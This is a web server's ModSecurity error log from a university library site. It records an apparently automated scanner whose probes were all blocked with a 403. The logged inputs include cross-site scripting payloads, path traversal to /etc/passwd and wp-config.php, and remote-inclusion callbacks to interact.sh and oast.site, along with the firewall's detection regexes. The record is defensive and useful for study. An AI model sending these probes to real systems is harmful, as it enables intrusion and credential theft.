[Tue Aug 29 11:55:52.668439 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:plugin: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/whizz/plugins/delete-plugin.php"] [unique_id "ZO16WMCo-f0AAArB1rwAAAAV"]
[Tue Aug 29 11:55:53.579284 2023] [:error] [pid 2755] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0acjpm3odtfthe.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0acjpm3odtfthe.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss"] [unique_id "ZO16WcCo-f0AAArD6bIAAAAX"]
[Tue Aug 29 11:55:53.857731 2023] [:error] [pid 2755] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:bgColor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:bgColor: _000000\\x22onload=\\x22prompt(1)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/Telerik.ReportViewer.axd"] [unique_id "ZO16WcCo-f0AAArD6bcAAAAX"]
[Tue Aug 29 11:55:53.947863 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:msgId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')// found within ARGS:msgId: ';alert('document.domain')//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/carbon/admin/login.jsp"] [unique_id "ZO16WcCo-f0AAAqeFekAAAAx"]
[Tue Aug 29 11:55:55.639892 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO16W8Co-f0AAArC7bEAAAAW"]
[Tue Aug 29 11:55:56.634181 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XMCo-f0AAAqSw2UAAAAN"]
[Tue Aug 29 11:55:56.732874 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: ax6zt\\x22><script>alert(document.domain)</script>y6uu6"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO16XMCo-f0AAAqSw2kAAAAN"]
[Tue Aug 29 11:55:57.649085 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/db-backup/download.php"] [unique_id "ZO16XcCo-f0AAAqTv0UAAAAa"]
[Tue Aug 29 11:55:58.720832 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:p: <img src onerror=alert(/XSS/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XsCo-f0AAAqSw3IAAAAN"]
[Tue Aug 29 11:55:58.762810 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO16XsCo-f0AAAq@scQAAAAM"]
[Tue Aug 29 11:56:00.182667 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:wpbase: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/sourceafrica/js/window.php"] [unique_id "ZO16YMCo-f0AAAqSw30AAAAN"]
[Tue Aug 29 11:56:00.641070 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:wlcms[_login_custom_js]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:wlcms[_login_custom_js]: alert(/XSS/);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16YMCo-f0AAApbUtAAAAAh"]
[Tue Aug 29 11:56:01.568081 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:hostname: \\x22)</script><script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO16YcCo-f0AAAqeFgUAAAAx"]
[Tue Aug 29 11:56:01.643476 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:username: test\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/goform/login_process"] [unique_id "ZO16YcCo-f0AAAq5@KcAAAAK"]
[Tue Aug 29 11:56:02.669244 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foruserlogin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foruserlogin: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/dolibarr/adherents/cartes/carte.php"] [unique_id "ZO16YsCo-f0AAAqY6O4AAAAr"]
[Tue Aug 29 11:56:02.678632 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keyword_search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: --!>\\x22  found within ARGS:keyword_search: --!>\\x22 autofocus onfocus=alert(/2Ue0IXhHNjNl9QMpplilzBsRqJA/);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/properties/"] [unique_id "ZO16YsCo-f0AAAqeFg0AAAAx"]
[Tue Aug 29 11:56:03.537515 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:urls[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:urls[]: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16Y8Co-f0AAAqY6PYAAAAr"]
[Tue Aug 29 11:56:03.542881 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cat_id: 6\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO16Y8Co-f0AAArB1u0AAAAV"]
[Tue Aug 29 11:56:03.544158 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:sortBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:sortBy: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16Y8Co-f0AAApbUtsAAAAh"]
[Tue Aug 29 11:56:04.552962 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/sap/public/bc/icf/logoff"] [unique_id "ZO16ZMCo-f0AAAqeFhwAAAAx"]
[Tue Aug 29 11:56:04.710351 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:snum. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:snum: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/featurific-for-wordpress/cached_image.php"] [unique_id "ZO16ZMCo-f0AAAqY6P0AAAAr"]
[Tue Aug 29 11:56:05.529353 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/simpel-reserveren/edit.php"] [unique_id "ZO16ZcCo-f0AAAqSw58AAAAN"]
[Tue Aug 29 11:56:05.699122 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ID: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php"] [unique_id "ZO16ZcCo-f0AAApbUu8AAAAh"]
[Tue Aug 29 11:56:06.713156 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:submit: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php"] [unique_id "ZO16ZsCo-f0AAApa-S8AAAAg"]
[Tue Aug 29 11:56:06.950531 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:title_az. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:title_az: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/title_az.php"] [unique_id "ZO16ZsCo-f0AAAqY6Q4AAAAr"]
[Tue Aug 29 11:56:07.536006 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16Z8Co-f0AAAq5@MQAAAAK"]
[Tue Aug 29 11:56:08.594897 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:count: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/goform/activate_process"] [unique_id "ZO16aMCo-f0AAArC7f0AAAAW"]
[Tue Aug 29 11:56:08.685146 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/plugins/content/jw_allvideos/includes/download.php"] [unique_id "ZO16aMCo-f0AAApbUwIAAAAh"]
